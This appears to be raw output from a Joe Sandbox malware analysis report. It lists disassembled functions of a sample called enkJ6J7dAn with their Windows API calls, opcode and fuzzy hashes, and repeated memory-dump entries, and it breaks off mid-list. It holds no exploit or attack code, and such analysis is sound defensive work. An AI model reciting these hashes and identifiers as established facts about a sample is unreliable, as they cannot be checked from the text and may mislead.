                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Variant$AllocClearCopyInitString
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2808897238-0
                                                                                                                    • Opcode ID: d4078b498bd58c38c4ff211c6799319bb2158b2b01decc8b4cd966ad5c1122ff
                                                                                                                    • Instruction ID: 372c40b5ecffa4d340e825e49f449287305c7189bb1404562c27c74c4f1437f4
                                                                                                                    • Opcode Fuzzy Hash: d4078b498bd58c38c4ff211c6799319bb2158b2b01decc8b4cd966ad5c1122ff
                                                                                                                    • Instruction Fuzzy Hash: 8251C436600209A6C700FF3AD8815DAB764EF84315F50863FFD0897252DB78DA1997EA
                                                                                                                    Function 0046993E Relevance: 6.1, APIs: 4, Instructions: 149windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • SendMessageW.USER32(00000000,0000110A,00000004,?), ref: 00469990
                                                                                                                    • __itow.LIBCMT ref: 004699CD
                                                                                                                      • Part of subcall function 00461C4A: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 00461CC2
                                                                                                                    • SendMessageW.USER32(00000000,0000110A,00000001,?), ref: 00469A3D
                                                                                                                    • __itow.LIBCMT ref: 00469A97
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: MessageSend$__itow
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3379773720-0
                                                                                                                    • Opcode ID: f450223117ea95bfee34014d9d84978b58918b7dbb146b9b64e9adf8c20a5af9
                                                                                                                    • Instruction ID: c5a9f548720e127460bbd30f9c4a1142764b372a0404ca0a71d180b9b8c9b2b0
                                                                                                                    • Opcode Fuzzy Hash: f450223117ea95bfee34014d9d84978b58918b7dbb146b9b64e9adf8c20a5af9
                                                                                                                    • Instruction Fuzzy Hash: E8415671A002096BDB14EF95D981AEF77BC9F58314F00405EFA0567281E7789E46CBE9
                                                                                                                    Function 004499DB Relevance: 6.1, APIs: 4, Instructions: 145COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetWindowRect.USER32(?,?), ref: 00449A4A
                                                                                                                    • ScreenToClient.USER32(?,?), ref: 00449A80
                                                                                                                    • MoveWindow.USER32(?,?,?,?,?,00000001), ref: 00449AEC
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Window$ClientMoveRectScreen
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3880355969-0
                                                                                                                    • Opcode ID: d0f348dd6b8999688d199205b3412f9258e7834e979bdc0e5f61431c3cd0f715
                                                                                                                    • Instruction ID: 772f2e9a8c44c8b90650fefa000f178a1b73e5e444e4323f54854131c67d2362
                                                                                                                    • Opcode Fuzzy Hash: d0f348dd6b8999688d199205b3412f9258e7834e979bdc0e5f61431c3cd0f715
                                                                                                                    • Instruction Fuzzy Hash: 5A517C70A00249AFEB14CF68D8C1AAB77B6FF58314F10822EF91597390D774AD90DB98
                                                                                                                    Function 0041415F Relevance: 6.1, APIs: 4, Instructions: 130COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: __flsbuf__flush__getptd_noexit__write_memmove
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2782032738-0
                                                                                                                    • Opcode ID: b31e9d6d4fc57bcba7966bec51b765adca5e1eea9d7940e8138ef5a4af09ff03
                                                                                                                    • Instruction ID: 72632960f292c6e9309c64fc9b7016af72cb639159fa0dd3c9cf05ee08d0b78d
                                                                                                                    • Opcode Fuzzy Hash: b31e9d6d4fc57bcba7966bec51b765adca5e1eea9d7940e8138ef5a4af09ff03
                                                                                                                    • Instruction Fuzzy Hash: CB41D531A00715ABDB248FA5C8486DFBBB5AFD0364F24856EF42597680D778DDC1CB48
                                                                                                                    Function 00441672 Relevance: 6.1, APIs: 4, Instructions: 116windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • ClientToScreen.USER32(00000000,?), ref: 0044169A
                                                                                                                    • GetWindowRect.USER32(?,?), ref: 00441722
                                                                                                                    • PtInRect.USER32(?,?,?), ref: 00441734
                                                                                                                    • MessageBeep.USER32(00000000), ref: 004417AD
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Rect$BeepClientMessageScreenWindow
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1352109105-0
                                                                                                                    • Opcode ID: efc75fb8ed246b6ad65f2e8b456486d9870e0f063911f7aa846460c85c9d1d50
                                                                                                                    • Instruction ID: 3e4d0a9d31bb6386801ef6381a7f0d6bf168684d8964ff5a195b0ca439f55e04
                                                                                                                    • Opcode Fuzzy Hash: efc75fb8ed246b6ad65f2e8b456486d9870e0f063911f7aa846460c85c9d1d50
                                                                                                                    • Instruction Fuzzy Hash: 5141A539A002049FE714DF54D884E6AB7B5FF95721F1482AED9158B360DB34AC81CB94
                                                                                                                    Function 0045D1AF Relevance: 6.1, APIs: 4, Instructions: 103fileCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • CreateHardLinkW.KERNEL32(00000000,?,00000000,?,00000000), ref: 0045D248
                                                                                                                    • GetLastError.KERNEL32(?,00000000), ref: 0045D26C
                                                                                                                    • DeleteFileW.KERNEL32(00000000,?,?,00000000), ref: 0045D28C
                                                                                                                    • CreateHardLinkW.KERNEL32(00000000,?,00000000,00000000,00000000,?,00000000), ref: 0045D2AA
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CreateHardLink$DeleteErrorFileLast
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3321077145-0
                                                                                                                    • Opcode ID: 49223ed515fb619a5bee3fab41eec0f0b951464039ac7af7222e30fa4423140a
                                                                                                                    • Instruction ID: 6818256dd78c2cb29ac0ce267de24fb792dca3a41353b59757f5ace631f71379
                                                                                                                    • Opcode Fuzzy Hash: 49223ed515fb619a5bee3fab41eec0f0b951464039ac7af7222e30fa4423140a
                                                                                                                    • Instruction Fuzzy Hash: DC318DB1A00201EBDB10EFB5C945A1ABBE8AF45319F10885EFC44AB343CB79ED45CB94
                                                                                                                    Function 0042083F Relevance: 6.1, APIs: 4, Instructions: 103COMMONLIBRARYCODE
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00420873
                                                                                                                    • __isleadbyte_l.LIBCMT ref: 004208A6
                                                                                                                    • MultiByteToWideChar.KERNEL32(BBDAE900,00000009,?,000001AC,00000000,00000000,?,?,?,0042D7C1,?,00000000), ref: 004208D7
                                                                                                                    • MultiByteToWideChar.KERNEL32(BBDAE900,00000009,?,00000001,00000000,00000000,?,?,?,0042D7C1,?,00000000), ref: 00420945
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3058430110-0
                                                                                                                    • Opcode ID: 6122c04dd5dc57efc0e5b6c0779ec963bae9ccf891294cd495d8fd5d7cdcec1f
                                                                                                                    • Instruction ID: f6550d230e50e909e13d2a99824cc28569674f7a7b9e5ef0daa2e7ce22e82e6e
                                                                                                                    • Opcode Fuzzy Hash: 6122c04dd5dc57efc0e5b6c0779ec963bae9ccf891294cd495d8fd5d7cdcec1f
                                                                                                                    • Instruction Fuzzy Hash: D731E231B00265EFDB20EF65E884AAF3BE5BF00310F55496AE4658B292D734CD80DB98
                                                                                                                    Function 0045039B Relevance: 6.1, APIs: 4, Instructions: 102COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetParent.USER32(?), ref: 004503C8
                                                                                                                    • DefDlgProcW.USER32(?,00000138,?,?), ref: 00450417
                                                                                                                    • DefDlgProcW.USER32(?,00000133,?,?), ref: 00450466
                                                                                                                    • DefDlgProcW.USER32(?,00000134,?,?), ref: 00450497
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Proc$Parent
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2351499541-0
                                                                                                                    • Opcode ID: 953005dfd523491bc8661b2d189c1fe3a1d27544861a9947cd3b684206b02ae0
                                                                                                                    • Instruction ID: 48835c6935d03606f494e5d0f95072c3389227be5880c4b08380f2331de9f088
                                                                                                                    • Opcode Fuzzy Hash: 953005dfd523491bc8661b2d189c1fe3a1d27544861a9947cd3b684206b02ae0
                                                                                                                    • Instruction Fuzzy Hash: F231B73A2001046BD720CF18DC94DAB7719EF97335B14461BFA298B3D3CB759856C769
                                                                                                                    Function 00442A83 Relevance: 6.1, APIs: 4, Instructions: 87windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00442AC9
                                                                                                                    • TranslateMessage.USER32(?), ref: 00442B01
                                                                                                                    • DispatchMessageW.USER32(?), ref: 00442B0B
                                                                                                                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00442B21
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Message$Peek$DispatchTranslate
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1795658109-0
                                                                                                                    • Opcode ID: 36eab9d42bd73f6f728abf92f57c3db94032fb3fd80da71d70c6aa8f6f72699a
                                                                                                                    • Instruction ID: 5e5183f3b0572ad37d893cec5a7cf9421d6c1ddc4b80b1975d6d8daaa3c1acd1
                                                                                                                    • Opcode Fuzzy Hash: 36eab9d42bd73f6f728abf92f57c3db94032fb3fd80da71d70c6aa8f6f72699a
                                                                                                                    • Instruction Fuzzy Hash: 012126719583469AFB30DF649D85FB7BBA8CB24314F40407BF91097281EAB86848C769
                                                                                                                    Function 0047438B Relevance: 6.1, APIs: 4, Instructions: 83COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetForegroundWindow.USER32(?,?,?), ref: 0047439C
                                                                                                                      • Part of subcall function 004439C1: GetWindowThreadProcessId.USER32(?,00000000), ref: 004439E4
                                                                                                                      • Part of subcall function 004439C1: GetCurrentThreadId.KERNEL32 ref: 004439EB
                                                                                                                      • Part of subcall function 004439C1: AttachThreadInput.USER32(00000000), ref: 004439F2
                                                                                                                    • GetCaretPos.USER32(?), ref: 004743B2
                                                                                                                    • ClientToScreen.USER32(00000000,?), ref: 004743E8
                                                                                                                    • GetForegroundWindow.USER32 ref: 004743EE
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2759813231-0
                                                                                                                    • Opcode ID: f13b499454a1a1822ca13fc8ae6b328d463f7326d10c65fcbffa9176c03fd335
                                                                                                                    • Instruction ID: 29594bdffde582d62cf8cb535202cb0f6e37f5c0e74140e0e8dac686a3932322
                                                                                                                    • Opcode Fuzzy Hash: f13b499454a1a1822ca13fc8ae6b328d463f7326d10c65fcbffa9176c03fd335
                                                                                                                    • Instruction Fuzzy Hash: 2F21AC71A00305ABD710EF75CC86B9E77B9AF44708F14446EF644BB2C2DBF9A9408BA5
                                                                                                                    Function 004494A5 Relevance: 6.1, APIs: 4, Instructions: 83windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00430626: _wcspbrk.LIBCMT ref: 00430636
                                                                                                                    • SendMessageW.USER32(?,00001002,00000000,?), ref: 00449477
                                                                                                                    • SendMessageW.USER32(?,00001060,00000000,00000004), ref: 00449507
                                                                                                                    • _wcslen.LIBCMT ref: 00449519
                                                                                                                    • _wcslen.LIBCMT ref: 00449526
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: MessageSend_wcslen$_wcspbrk
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2886238975-0
                                                                                                                    • Opcode ID: cda1f7e16000b3d6f1552df2769fac91363fb93f1f54a3f578086acf89ecf69d
                                                                                                                    • Instruction ID: 7d4d19c59aaf55394df3596c947b25f6969e765268ec3300c5285dc4bbf20b28
                                                                                                                    • Opcode Fuzzy Hash: cda1f7e16000b3d6f1552df2769fac91363fb93f1f54a3f578086acf89ecf69d
                                                                                                                    • Instruction Fuzzy Hash: F7213A76B00208A6E730DF55ED81BEFB368EBA0310F10416FFF0896240E6794D55C799
                                                                                                                    Function 0046888B Relevance: 6.1, APIs: 4, Instructions: 80COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: __setmode$DebugOutputString_fprintf
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1792727568-0
                                                                                                                    • Opcode ID: 1ad8d8d19ebad69fc12c553a92627abd23c9aa4f6f7f42f57f8396caf8494ece
                                                                                                                    • Instruction ID: 94d91137fd77379d51e6296772f15362c7f2cf1f8b16651245aa9cc134f84072
                                                                                                                    • Opcode Fuzzy Hash: 1ad8d8d19ebad69fc12c553a92627abd23c9aa4f6f7f42f57f8396caf8494ece
                                                                                                                    • Instruction Fuzzy Hash: 5411A1B2D0020477DB107BB69C469AF7B2C8B55728F04416EF91573243E97C6A4947AB
                                                                                                                    Function 0047A26A Relevance: 6.1, APIs: 4, Instructions: 78COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 0046F3C1: IsWindow.USER32(00000000), ref: 0046F3F1
                                                                                                                    • GetWindowLongW.USER32(?,000000EC), ref: 0047A2DF
                                                                                                                    • SetWindowLongW.USER32(?,000000EC,00000000), ref: 0047A2FA
                                                                                                                    • SetWindowLongW.USER32(?,000000EC,00000000), ref: 0047A312
                                                                                                                    • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002,?,000000EC,00000000,?,000000EC,?,00000001), ref: 0047A321
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Window$Long$AttributesLayered
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2169480361-0
                                                                                                                    • Opcode ID: 53dc7990cfeb01f65bcc542d15cac6368a2c86d5c8ae23ecc65d9f578e391a7a
                                                                                                                    • Instruction ID: 4b457c036b32d13d4d6aa44b7b333d7b15c6210fa1ac615a770d46c951a2b689
                                                                                                                    • Opcode Fuzzy Hash: 53dc7990cfeb01f65bcc542d15cac6368a2c86d5c8ae23ecc65d9f578e391a7a
                                                                                                                    • Instruction Fuzzy Hash: E321C3322045146BD310AB19EC45F9BB798EF81334F20862BF859E72D1C779A855C7AC
                                                                                                                    Function 00434CC9 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 75stringCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00434C09: lstrlenW.KERNEL32(?), ref: 00434C1C
                                                                                                                      • Part of subcall function 00434C09: lstrcpyW.KERNEL32(00000000,?), ref: 00434C44
                                                                                                                      • Part of subcall function 00434C09: lstrcmpiW.KERNEL32(00000000,00000000), ref: 00434C78
                                                                                                                    • lstrlenW.KERNEL32(?), ref: 00434CF6
                                                                                                                      • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                                                                    • lstrcpyW.KERNEL32(00000000,?), ref: 00434D1E
                                                                                                                    • lstrcmpiW.KERNEL32(00000002,cdecl), ref: 00434D64
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
